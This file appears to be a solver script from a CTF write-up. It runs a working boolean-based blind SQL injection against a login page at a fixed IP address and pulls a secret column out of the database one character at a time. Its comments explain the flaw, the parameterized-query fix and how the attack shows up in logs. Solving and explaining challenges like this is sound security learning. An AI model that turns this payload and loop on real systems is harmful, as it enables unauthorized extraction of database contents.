import requests

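# Solver for the CTF challenge in this writeup: boolean-based blind SQL
# injection against the login page, recovering `secret` from `flag_tbl`
# one character at a time.
#
# Why it works (defender's view): the `username` query parameter reaches the
# SQL statement unescaped, so a client can append a condition of its own, and
# the page answers differently depending on whether that condition is true
# ("Try again!" is missing when it is). That one-bit difference is enough to
# read any value the database account can select. The fix is a parameterized
# query; hiding the message alone does not remove the injection. In logs this
# shows up as a long run of near-identical login requests from one client
# with SQL functions such as ascii()/substr() inside the parameter.

result = ''
url = 'http://137.117.210.176:13372/'

# Multipart body with a single PHP_SESSION_UPLOAD_PROGRESS field, the default
# field name of PHP's session upload-progress feature.
# NOTE(review): presumably sent so PHP populates session data for the
# PHPSESSID below; the page does not explain why the challenge needs it.
data = '''------WebKitFormBoundary8Jltb5vw5fWfSYS4
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

asdfasdfasdf
------WebKitFormBoundary8Jltb5vw5fWfSYS4--'''
headers = {
    'Cookie': 'PHPSESSID=yelang123;',
    'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary8Jltb5vw5fWfSYS4',
}

# x is the 1-based character position in the value, i the candidate ASCII code.
for x in range(1, 10000):
    for i in range(32, 128):
        # {1} -> position x, {0} -> candidate code i; %23 is an encoded '#',
        # which comments out the rest of the original statement.
        payload = "templates/login.php?username=1\"or if(ascii(substr((select group_concat(secret) from flag_tbl),{1},1))={0},1,0)%23&password=tlqkf12a".format(i, x)
        # A timeout keeps a stalled connection from hanging the script forever.
        r = requests.post(url + payload, headers=headers, data=data, timeout=10)
        if "Try again!" not in r.text:
            # Condition was true: character x has code i.
            result += chr(i)
            print(result)
            break
    else:
        # No printable ASCII code matched at this position, so treat it as the
        # end of the value. The original kept going through all 9999 positions
        # (96 requests each) after the value had already been read.
        break
print(result)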
